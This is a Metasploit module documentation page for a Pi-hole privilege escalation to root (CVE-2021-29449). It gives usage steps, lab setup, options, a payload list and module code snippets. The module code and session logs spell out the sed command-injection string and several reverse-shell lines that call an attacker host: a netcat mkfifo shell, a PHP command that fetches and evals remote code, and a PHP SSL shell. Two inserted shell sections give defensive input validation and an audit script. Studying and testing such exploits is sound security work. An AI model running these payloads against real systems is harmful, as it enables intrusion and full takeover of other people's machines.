Pi-Hole Remove Commands Linux Priv Esc - Metasploit


This page contains detailed information about how to use the exploit/linux/local/pihole_remove_commands_lpe Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Pi-Hole Remove Commands Linux Priv Esc
Module: exploit/linux/local/pihole_remove_commands_lpe
Source code: modules/exploits/linux/local/pihole_remove_commands_lpe.rb
Disclosure date: 2021-04-20
Last modification time: 2022-05-04 15:03:34 +0000
Supported architecture(s): cmd
Supported platform(s): Linux, Unix
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2021-29449

Pi-Hole versions 3.0 - 5.3 allow command line input to the removecustomcname, removecustomdns, and removestaticdhcp functions without properly validating the parameters before passing them to sed. When executed as the www-data user, this allows privilege escalation to root, since www-data is in the sudoers.d/pihole file with no password required.

Module Ranking and Traits


Module Ranking:

  • great: The exploit has a default target AND either auto-detects the appropriate target or uses an application-specific return address AFTER a version check. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • config-changes: Module modifies some configuration setting on the target machine.
  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).

Basic Usage


Note: To run a local exploit, make sure you are at the msf prompt. Also, to check the session ID, use the sessions command.

msf > use exploit/linux/local/pihole_remove_commands_lpe
msf exploit(pihole_remove_commands_lpe) > show targets
    ... a list of targets ...
msf exploit(pihole_remove_commands_lpe) > set TARGET target-id
msf exploit(pihole_remove_commands_lpe) > show options
    ... show and set options ...
msf exploit(pihole_remove_commands_lpe) > set SESSION session-id
msf exploit(pihole_remove_commands_lpe) > exploit

Required Options


  • SESSION: The session to run this module on.

Knowledge Base


Vulnerable Application


Pi-Hole versions 3.0 - 5.3 allow command line input to the removecustomcname (5.1-5.2.4), removecustomdns (5.0-5.2.4), and removestaticdhcp (3.0-5.2.4) functions without properly validating the parameters before passing them to sed. When executed as the www-data user, this allows privilege escalation to root, since www-data is in the sudoers.d/pihole file with no password required.
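The defensive counterpart of the fault described above, as an added example that is neither Pi-hole's own code nor part of the module: every value that would reach an add or remove command is first checked against a strict grammar (MAC address, IPv4 address, hostname), and the matching line is removed by a literal prefix comparison in awk rather than by splicing the value into a sed expression. The dnsmasq-style `dhcp-host=<mac>,<ip>,<hostname>` line layout and the function names are assumptions made for the example.

```shell
#!/bin/sh
# Added example; not Pi-hole's own code and not part of the Metasploit module.
# The fault class on this page is a caller-supplied string spliced into a sed
# expression (the shape  sed -i "/$value/d" file  with $value unchecked).
# Here each value is validated first, and the line is removed with a literal
# prefix comparison, so no sed expression is ever built from input.
#
# Assumed file layout (dnsmasq style): dhcp-host=<mac>,<ip>,<hostname>

# 0 if $1 is a colon-separated MAC address, 1 otherwise.
is_mac() {
    printf '%s\n' "$1" | grep -Eq '^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
}

# 0 if $1 is a dotted-quad IPv4 address with each octet in 0..255.
is_ipv4() {
    printf '%s\n' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
    old_ifs=$IFS
    IFS=.
    set -- $1
    IFS=$old_ifs
    for octet in "$@"; do
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# 0 if $1 consists only of RFC 1123 hostname labels joined by dots.
is_hostname() {
    printf '%s\n' "$1" | grep -Eq \
        '^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$'
}

# Append a lease line to file $1 for MAC $2, IP $3, hostname $4.
# Returns 2 (and writes nothing) if any argument fails validation.
add_static_dhcp_entry() {
    is_mac "$2" && is_ipv4 "$3" && is_hostname "$4" || {
        printf 'rejected lease: %s %s %s\n' "$2" "$3" "$4" >&2
        return 2
    }
    printf 'dhcp-host=%s,%s,%s\n' "$(printf '%s' "$2" | tr 'A-Z' 'a-z')" "$3" "$4" >> "$1"
}

# Remove the lease for MAC $2 from file $1. Returns 2 on a rejected MAC,
# 0 otherwise (also when no line matched).
remove_static_dhcp_entry() {
    is_mac "$2" || {
        printf 'rejected MAC: %s\n' "$2" >&2
        return 2
    }
    mac=$(printf '%s' "$2" | tr 'A-Z' 'a-z')
    tmp=$(mktemp) || return 1
    # index()==1 means "line starts with this literal prefix"; characters such
    # as '/' or ';' in the input have no special meaning here, and a value that
    # reached this point has already passed is_mac anyway.
    awk -v needle="dhcp-host=${mac}," 'index(tolower($0), needle) != 1' "$1" > "$tmp" \
        && mv "$tmp" "$1"
}
```

The two layers are independent: the grammar checks reject anything that is not a lease value at all, and the literal comparison guarantees that even a value which slipped past them could only ever be compared against, never interpreted by, the tool that edits the file.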

Install

More info at https://github.com/pi-hole/docker-pi-hole/

Docker v4.3

$ cat ~/docker-compose.yml 
version: "3"

services:
  pihole:
    container_name: pihole
    image: pihole/pihole:4.3
    ports:
      #- "53:53/tcp"
      #- "53:53/udp"
      #- "67:67/udp"
      - "80:80/tcp"
    environment:
      TZ: 'America/Chicago'
      WEBPASSWORD: ''
    # Volumes store your data between container upgrades
    volumes:
      - './etc-pihole/:/etc/pihole/'
      - './etc-dnsmasq.d/:/etc/dnsmasq.d/'
    # Recommended but not required (DHCP needs NET_ADMIN)
    #   https://github.com/pi-hole/docker-pi-hole#note-on-capabilities
    cap_add:
      - NET_ADMIN
    restart: unless-stopped

Now obtain the initial session with the unix/http/pihole_dhcp_mac_exec module.

Docker v5.0

$ cat ~/docker-compose.yml 
version: "3"

services:
  pihole:
    container_name: pihole
    image: pihole/pihole:v5.0
    ports:
      #- "53:53/tcp"
      #- "53:53/udp"
      #- "67:67/udp"
      - "80:80/tcp"
    environment:
      TZ: 'America/Chicago'
      WEBPASSWORD: ''
    # Volumes store your data between container upgrades
    volumes:
      - './etc-pihole/:/etc/pihole/'
      - './etc-dnsmasq.d/:/etc/dnsmasq.d/'
    # Recommended but not required (DHCP needs NET_ADMIN)
    #   https://github.com/pi-hole/docker-pi-hole#note-on-capabilities
    cap_add:
      - NET_ADMIN
    restart: unless-stopped

Get a shell through console:

$ sudo docker-compose exec pihole /bin/bash

Switch to www-data user:

su - www-data -s /bin/bash

Now execute a payload to simulate the initial access.

Docker v5.1

$ cat ~/docker-compose.yml 
version: "3"

services:
  pihole:
    container_name: pihole
    image: pihole/pihole:v5.1
    ports:
      #- "53:53/tcp"
      #- "53:53/udp"
      #- "67:67/udp"
      - "80:80/tcp"
    environment:
      TZ: 'America/Chicago'
      WEBPASSWORD: ''
    # Volumes store your data between container upgrades
    volumes:
      - './etc-pihole/:/etc/pihole/'
      - './etc-dnsmasq.d/:/etc/dnsmasq.d/'
    # Recommended but not required (DHCP needs NET_ADMIN)
    #   https://github.com/pi-hole/docker-pi-hole#note-on-capabilities
    cap_add:
      - NET_ADMIN
    restart: unless-stopped

Get a shell through console:

$ sudo docker-compose exec pihole /bin/bash

Switch to www-data user:

su - www-data -s /bin/bash

Now execute a payload to simulate the initial access.

Docker

Verification Steps


  1. Install the application
  2. Start msfconsole
  3. Get a session with www-data permissions
  4. Do: use exploit/linux/local/pihole_remove_commands_lpe
  5. Do: set session [#]
  6. Do: set target [NAME]
  7. Do: run
  8. You should get a root shell.

Options


Target: DHCP

Exploits the removestaticdhcp command through the /etc/dnsmasq.d/04-pihole-static-dhcp.conf file. Versions 3.0-5.2.4 are vulnerable. This is the default target.

Target: DNS

Exploits the removecustomdns command through the /etc/pihole/custom.list file. Versions 5.0-5.2.4 are vulnerable.

Target: CNAME

Exploits the removecustomcname command through the /etc/dnsmasq.d/05-pihole-custom-cname.conf file. Versions 5.1-5.2.4 are vulnerable.
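The per-target version ranges above, together with the www-data sudo grant the description relies on, can be turned into a quick defender-side audit. The following POSIX shell functions are an added example, not part of the module or of Pi-hole: ver_in_range compares dotted versions numerically, affected_commands lists which remove commands fall inside the ranges given for the DHCP, DNS and CNAME targets, and audit_pihole adds whether a sudoers fragment grants www-data passwordless use of pihole. The ranges are the ones stated on this page; the function names are assumptions, and any sudoers line fed to it in the usage note is a constructed sample.

```shell
#!/bin/sh
# Added example; not part of the Metasploit module or of Pi-hole.
# Ranges per remove command (from the target descriptions above):
#   removestaticdhcp  3.0 - 5.2.4
#   removecustomdns   5.0 - 5.2.4
#   removecustomcname 5.1 - 5.2.4

# 0 if dotted version $1 lies in [$2, $3], comparing up to four numeric components.
ver_in_range() {
    awk -v v="$1" -v lo="$2" -v hi="$3" '
        function cmp(a, b,   x, y, i) {
            split(a, x, "[.]"); split(b, y, "[.]")
            for (i = 1; i <= 4; i++)
                if (x[i] + 0 != y[i] + 0) return (x[i] + 0 < y[i] + 0) ? -1 : 1
            return 0
        }
        BEGIN { exit !(cmp(v, lo) >= 0 && cmp(v, hi) <= 0) }'
}

# Print the affected remove commands for version $1 (a leading "v" is tolerated).
affected_commands() {
    v=${1#v}
    out=""
    ver_in_range "$v" 3.0 5.2.4 && out="$out removestaticdhcp"
    ver_in_range "$v" 5.0 5.2.4 && out="$out removecustomdns"
    ver_in_range "$v" 5.1 5.2.4 && out="$out removecustomcname"
    printf '%s' "${out# }"
}

# 0 if sudoers fragment $1 lets user $2 run pihole with NOPASSWD.
has_nopasswd_pihole() {
    grep -Eq "^[[:space:]]*$2[[:space:]].*NOPASSWD:.*pihole" "$1"
}

# One-line verdict for version $1 and sudoers fragment $2.
audit_pihole() {
    cmds=$(affected_commands "$1")
    [ -n "$cmds" ] || { printf 'not affected'; return 0; }
    if has_nopasswd_pihole "$2" www-data; then grant=yes; else grant=no; fi
    printf 'affected: %s; www-data NOPASSWD pihole: %s' "$cmds" "$grant"
}
```

Call it as `audit_pihole v5.2.4 /etc/sudoers.d/pihole` with the version string the host reports; the result is a single line such as `affected: removestaticdhcp removecustomdns removecustomcname; www-data NOPASSWD pihole: yes`, or `not affected` once the version is 5.3 or later. A host that is in range but lacks the grant is still worth fixing, but it is the combination of the two that the module turns into a root shell.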

Scenarios


Pi-hole version 4.3.2

Initial Session


[*] Processing pihole.rb for ERB directives.
resource (pihole.rb)> use unix/http/pihole_dhcp_mac_exec
[*] Using configured payload cmd/unix/reverse_netcat
resource (pihole.rb)> set payload payload/cmd/unix/reverse_python
payload => cmd/unix/reverse_python
resource (pihole.rb)> set rhosts 192.168.2.40
rhosts => 192.168.2.40
resource (pihole.rb)> set lhost 192.168.2.129
lhost => 192.168.2.129
resource (pihole.rb)> set verbose true
verbose => true
resource (pihole.rb)> exploit
[*] Started reverse TCP handler on 192.168.2.129:4444 
[+] Version Detected: 4.3
[*] Using cookie: PHPSESSID=p2cnattrr0ffn51833141uaite;
[*] Using token: 3oEAhv+GdLt80vxFq4u5o4N8fYuq9DPonLg+ZO+QHo8=
[*] Validating path with MAC: 9F38D6019D1D
[+] System env path exploitable: /opt/pihole:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
[*] Payload MAC will be: B0DA4A294E35
[*] Shellcode: B0DA4A294E35&&W=${PATH#/???/}&&P=${W%%?????:*}&&X=${PATH#/???/??}&&H=${X%%???:*}&&Z=${PATH#*:/??}&&R=${Z%%/*}&&$P$H$P$IFS-$R$IFS'EXEC(HEX2BIN("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"));'&&
[*] Sending Exploit
[*] Attempting to clean 9F38D6019D1D from config
[*] Attempting to clean B0DA4A294E35 from config
[*] Command shell session 1 opened (192.168.2.129:4444 -> 192.168.2.40:55430) at 2021-05-30 11:10:28 -0400

whoami
www-data
uname -a
Linux pihole 4.15.0-64-generic #73-Ubuntu SMP Thu Sep 12 13:16:13 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
^Z
Background session 1? [y/N]  y

Priv Esc


resource (pihole.rb)> use exploit/linux/local/pihole_remove_commands_lpe
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
resource (pihole.rb)> set verbose true
verbose => true
msf6 exploit(linux/local/pihole_remove_commands_lpe) > set session 1
session => 1
msf6 exploit(linux/local/pihole_remove_commands_lpe) > exploit

[+] mkfifo /tmp/lodcpa; nc 192.168.2.129 4444 0/tmp/lodcpa 2>&1; rm /tmp/lodcpa
[*] Started reverse TCP handler on 192.168.2.129:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Current user: www-data
[*] Pi-hole version: 4.3.2
[+] The target appears to be vulnerable. Pi-Hole 4.3.2 with user www-data is vulnerable and exploitable
[+] /etc/dnsmasq.d/04-pihole-static-dhcp.conf found!
[*] Executing payload against removestaticdhcp command
[*] Command shell session 2 opened (192.168.2.129:4444 -> 192.168.2.40:55466) at 2021-05-30 11:11:31 -0400

whoami
root
uname -a
Linux pihole 4.15.0-64-generic #73-Ubuntu SMP Thu Sep 12 13:16:13 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

Pi-hole version 5.0

Initial Session


msf6 exploit(multi/handler) > use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set target 1
target => 1
msf6 exploit(multi/script/web_delivery) > set payload payload/php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/script/web_delivery) > 
[*] Started reverse TCP handler on 192.168.2.129:4444 
[*] Using URL: http://0.0.0.0:8080/pmL2Ap
[*] Local IP: http://192.168.2.129:8080/pmL2Ap
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.2.129:8080/pmL2Ap', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"
[*] 172.19.0.2       web_delivery - Delivering Payload (1114 bytes)
[*] Sending stage (39282 bytes) to 172.19.0.2
[*] Meterpreter session 3 opened (192.168.2.129:4444 -> 172.19.0.2:55344) at 2021-05-30 11:46:31 -0400

Priv Esc


msf6 exploit(multi/script/web_delivery) > use exploit/linux/local/pihole_remove_commands_lpe
[*] Using configured payload cmd/unix/reverse_php_ssl
msf6 exploit(linux/local/pihole_remove_commands_lpe) > set target dns
target => dns
msf6 exploit(linux/local/pihole_remove_commands_lpe) > set session 1
session => 1
msf6 exploit(linux/local/pihole_remove_commands_lpe) > sessions

Active sessions
===============

  Id  Name  Type                   Information                   Connection
  --  ----  ----                   -----------                   ----------
  3         meterpreter php/linux  www-data (33) @ a5d63e5df67d  192.168.2.129:4444 -> 172.19.0.2:55344 (172.19.0.2)

msf6 exploit(linux/local/pihole_remove_commands_lpe) > set session 3
session => 3
msf6 exploit(linux/local/pihole_remove_commands_lpe) > set target DNS
target => DNS
msf6 exploit(linux/local/pihole_remove_commands_lpe) > run

[+] php -r '$ctxt=stream_context_create(["ssl"=>["verify_peer"=>false,"verify_peer_name"=>false]]);while($s=@stream_socket_client("ssl://192.168.2.129:4444",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);$o=implode("\n",$o);$o.="\n";fputs($s,$o);}}'&
[!] SESSION may not be compatible with this module (unloadable Meterpreter extension: )
[*] Started reverse SSL handler on 192.168.2.129:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Current user: www-data
[*] Pi-hole version: 5.0
[+] The target appears to be vulnerable. Pi-Hole 5.0 with user www-data is vulnerable and exploitable
[+] /etc/pihole/custom.list found!
[*] Executing payload against removecustomdns command
[*] Command shell session 5 opened (192.168.2.129:4444 -> 172.19.0.2:55368) at 2021-05-30 11:54:30 -0400

whoami
root
uname -a
Linux a5d63e5df67d 5.10.0-kali7-amd64 #1 SMP Debian 5.10.28-1kali1 (2021-04-12) x86_64 GNU/Linux


Msfconsole Usage


Here is how the linux/local/pihole_remove_commands_lpe exploit module looks in the msfconsole:

msf6 > use exploit/linux/local/pihole_remove_commands_lpe

[*] Using configured payload cmd/unix/reverse_php_ssl
msf6 exploit(linux/local/pihole_remove_commands_lpe) > show info

       Name: Pi-Hole Remove Commands Linux Priv Esc
     Module: exploit/linux/local/pihole_remove_commands_lpe
   Platform: Unix, Linux
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2021-04-20

Provided by:
  h00die
  Emanuele Barbeno <[email protected]>

Module side effects:
 config-changes
 ioc-in-logs

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   DHCP
  1   DNS
  2   CNAME

Check supported:
  Yes

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Payload information:
  Avoid: 1 characters

Description:
  Pi-Hole versions 3.0 - 5.3 allows for command line input to the 
  removecustomcname, removecustomdns, and removestaticdhcp functions 
  without properly validating the parameters before passing to sed. 
  When executed as the www-data user, this allows for a privilege 
  escalation to root since www-data is in the sudoers.d/pihole file 
  with no password.

References:
  https://github.com/pi-hole/pi-hole/security/advisories/GHSA-3597-244c-wrpj
  https://www.compass-security.com/fileadmin/Research/Advisories/2021-02_CSNC-2021-008_Pi-hole_Privilege_Escalation.txt
  https://nvd.nist.gov/vuln/detail/CVE-2021-29449

Module Options


This is a complete list of options available in the linux/local/pihole_remove_commands_lpe exploit:

msf6 exploit(linux/local/pihole_remove_commands_lpe) > show options

Module options (exploit/linux/local/pihole_remove_commands_lpe):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Payload options (cmd/unix/reverse_php_ssl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   DHCP

Advanced Options


Here is a complete list of advanced options supported by the linux/local/pihole_remove_commands_lpe exploit:

msf6 exploit(linux/local/pihole_remove_commands_lpe) > show advanced

Module advanced options (exploit/linux/local/pihole_remove_commands_lpe):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   AutoCheck               true             no        Run check before exploit
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   ForceExploit            false            no        Override check result
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session

Payload advanced options (cmd/unix/reverse_php_ssl):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   HandlerSSLCert                               no        Path to a SSL certificate in unified PEM format
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/local/pihole_remove_commands_lpe module can exploit:

msf6 exploit(linux/local/pihole_remove_commands_lpe) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   DHCP
   1   DNS
   2   CNAME

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/local/pihole_remove_commands_lpe exploit:

msf6 exploit(linux/local/pihole_remove_commands_lpe) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/cmd/unix/bind_awk                                    normal  No     Unix Command Shell, Bind TCP (via AWK)
   1   payload/cmd/unix/bind_busybox_telnetd                        normal  No     Unix Command Shell, Bind TCP (via BusyBox telnetd)
   2   payload/cmd/unix/bind_inetd                                  normal  No     Unix Command Shell, Bind TCP (inetd)
   3   payload/cmd/unix/bind_jjs                                    normal  No     Unix Command Shell, Bind TCP (via jjs)
   4   payload/cmd/unix/bind_lua                                    normal  No     Unix Command Shell, Bind TCP (via Lua)
   5   payload/cmd/unix/bind_netcat                                 normal  No     Unix Command Shell, Bind TCP (via netcat)
   6   payload/cmd/unix/bind_netcat_gaping                          normal  No     Unix Command Shell, Bind TCP (via netcat -e)
   7   payload/cmd/unix/bind_netcat_gaping_ipv6                     normal  No     Unix Command Shell, Bind TCP (via netcat -e) IPv6
   8   payload/cmd/unix/bind_nodejs                                 normal  No     Unix Command Shell, Bind TCP (via nodejs)
   9   payload/cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)
   10  payload/cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   11  payload/cmd/unix/bind_r                                      normal  No     Unix Command Shell, Bind TCP (via R)
   12  payload/cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)
   13  payload/cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   14  payload/cmd/unix/bind_socat_udp                              normal  No     Unix Command Shell, Bind UDP (via socat)
   15  payload/cmd/unix/bind_stub                                   normal  No     Unix Command Shell, Bind TCP (stub)
   16  payload/cmd/unix/bind_zsh                                    normal  No     Unix Command Shell, Bind TCP (via Zsh)
   17  payload/cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
   18  payload/cmd/unix/pingback_bind                               normal  No     Unix Command Shell, Pingback Bind TCP (via netcat)
   19  payload/cmd/unix/pingback_reverse                            normal  No     Unix Command Shell, Pingback Reverse TCP (via netcat)
   20  payload/cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   21  payload/cmd/unix/reverse_awk                                 normal  No     Unix Command Shell, Reverse TCP (via AWK)
   22  payload/cmd/unix/reverse_bash                                normal  No     Unix Command Shell, Reverse TCP (/dev/tcp)
   23  payload/cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   24  payload/cmd/unix/reverse_bash_udp                            normal  No     Unix Command Shell, Reverse UDP (/dev/udp)
   25  payload/cmd/unix/reverse_jjs                                 normal  No     Unix Command Shell, Reverse TCP (via jjs)
   26  payload/cmd/unix/reverse_ksh                                 normal  No     Unix Command Shell, Reverse TCP (via Ksh)
   27  payload/cmd/unix/reverse_lua                                 normal  No     Unix Command Shell, Reverse TCP (via Lua)
   28  payload/cmd/unix/reverse_ncat_ssl                            normal  No     Unix Command Shell, Reverse TCP (via ncat)
   29  payload/cmd/unix/reverse_netcat                              normal  No     Unix Command Shell, Reverse TCP (via netcat)
   30  payload/cmd/unix/reverse_netcat_gaping                       normal  No     Unix Command Shell, Reverse TCP (via netcat -e)
   31  payload/cmd/unix/reverse_nodejs                              normal  No     Unix Command Shell, Reverse TCP (via nodejs)
   32  payload/cmd/unix/reverse_openssl                             normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)
   33  payload/cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)
   34  payload/cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   35  payload/cmd/unix/reverse_php_ssl                             normal  No     Unix Command Shell, Reverse TCP SSL (via php)
   36  payload/cmd/unix/reverse_python                              normal  No     Unix Command Shell, Reverse TCP (via Python)
   37  payload/cmd/unix/reverse_python_ssl                          normal  No     Unix Command Shell, Reverse TCP SSL (via python)
   38  payload/cmd/unix/reverse_r                                   normal  No     Unix Command Shell, Reverse TCP (via R)
   39  payload/cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   40  payload/cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   41  payload/cmd/unix/reverse_socat_udp                           normal  No     Unix Command Shell, Reverse UDP (via socat)
   42  payload/cmd/unix/reverse_ssh                                 normal  No     Unix Command Shell, Reverse TCP SSH
   43  payload/cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)
   44  payload/cmd/unix/reverse_stub                                normal  No     Unix Command Shell, Reverse TCP (stub)
   45  payload/cmd/unix/reverse_tclsh                               normal  No     Unix Command Shell, Reverse TCP (via Tclsh)
   46  payload/cmd/unix/reverse_zsh                                 normal  No     Unix Command Shell, Reverse TCP (via Zsh)
   47  payload/generic/custom                                       normal  No     Custom Payload
   48  payload/generic/shell_bind_tcp                               normal  No     Generic Command Shell, Bind TCP Inline
   49  payload/generic/shell_reverse_tcp                            normal  No     Generic Command Shell, Reverse TCP Inline

Evasion Options


Here is the full list of possible evasion options supported by the linux/local/pihole_remove_commands_lpe exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/local/pihole_remove_commands_lpe) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Error Messages


This module may fail with the following error messages:

Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.

Pi-Hole version <V> is >= 5.3 and not vulnerable


Here is a relevant code snippet related to the "Pi-Hole version <V> is >= 5.3 and not vulnerable" error message:

76:	    w = whoami
77:	    print_status("Current user: #{w}")
78:	    v = pihole_version
79:	    print_status("Pi-hole version: #{v}")
80:	    unless v.between?(target['min'], Rex::Version.new('5.3'))
81:	      return CheckCode::Safe("Pi-Hole version #{v} is >= 5.3 and not vulnerable")
82:	    end
83:	    unless w == 'www-data'
84:	      return CheckCode::Safe("User must be www-data, currently #{w}")
85:	    end
86:	

User must be www-data, currently <W>


Here is a relevant code snippet related to the "User must be www-data, currently <W>" error message:

79:	    print_status("Pi-hole version: #{v}")
80:	    unless v.between?(target['min'], Rex::Version.new('5.3'))
81:	      return CheckCode::Safe("Pi-Hole version #{v} is >= 5.3 and not vulnerable")
82:	    end
83:	    unless w == 'www-data'
84:	      return CheckCode::Safe("User must be www-data, currently #{w}")
85:	    end
86:	
87:	    CheckCode::Appears("Pi-Hole #{v} with user #{w} is vulnerable and exploitable")
88:	  end
89:	

Pi-Hole <V> with user <W> is vulnerable and exploitable


Here is a relevant code snippet related to the "Pi-Hole <V> with user <W> is vulnerable and exploitable" error message:

82:	    end
83:	    unless w == 'www-data'
84:	      return CheckCode::Safe("User must be www-data, currently #{w}")
85:	    end
86:	
87:	    CheckCode::Appears("Pi-Hole #{v} with user #{w} is vulnerable and exploitable")
88:	  end
89:	
90:	  def method_dhcp
91:	    f = '/etc/dnsmasq.d/04-pihole-static-dhcp.conf'
92:	    if !file?(f) || read_file(f).empty?

Config file not found: <F>


Here is a relevant code snippet related to the "Config file not found: <F>" error message:

94:	      ip = "10.199.#{rand_text_numeric(1..2).to_i}.#{rand_text_numeric(1..2).to_i}"
95:	      print_status("Adding static DHCP #{mac} #{ip}")
96:	      cmd_exec("#{sudo_pihole} addstaticdhcp '#{mac}' '#{ip}'")
97:	    end
98:	    unless file?(f)
99:	      print_error("Config file not found: #{f}")
100:	      return
101:	    end
102:	    print_good("#{f} found!")
103:	    print_status('Executing payload against removestaticdhcp command')
104:	    cmd_exec("#{sudo_pihole} removestaticdhcp 'a/d ; 1e #{payload.encoded} ; /'")

Config file not found: <F>


Here is a relevant code snippet related to the "Config file not found: <F>" error message:

114:	      ip = "10.199.#{rand_text_numeric(1..2).to_i}.#{rand_text_numeric(1..2).to_i}"
115:	      print_status("Adding DNS entry #{name} #{ip}")
116:	      cmd_exec("#{sudo_pihole} addcustomdns '#{ip}' '#{name}'")
117:	    end
118:	    unless file?(f)
119:	      print_error("Config file not found: #{f}")
120:	      return
121:	    end
122:	    print_good("#{f} found!")
123:	    print_status('Executing payload against removecustomdns command')
124:	    cmd_exec("#{sudo_pihole} removecustomdns 'a/d ; 1e #{payload.encoded} ; /'")

Config file not found: <F>


Here is a relevant code snippet related to the "Config file not found: <F>" error message:

133:	      name = "#{rand_text_alphanumeric(8..12)}.edu"
134:	      print_status("Adding CNAME entry #{name}")
135:	      cmd_exec("#{sudo_pihole} addcustomcname '#{name}' '#{name}'")
136:	    end
137:	    unless file?(f)
138:	      print_error("Config file not found: #{f}")
139:	      return
140:	    end
141:	    print_good("#{f} found!")
142:	    print_status('Executing payload against removecustomcname command')
143:	    cmd_exec("#{sudo_pihole} removecustomcname 'a/d ; 1e #{payload.encoded} ; /'")

Authors


  • h00die
  • Emanuele Barbeno <emanuele.barbeno[at]compass-security.com>

Version


This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.
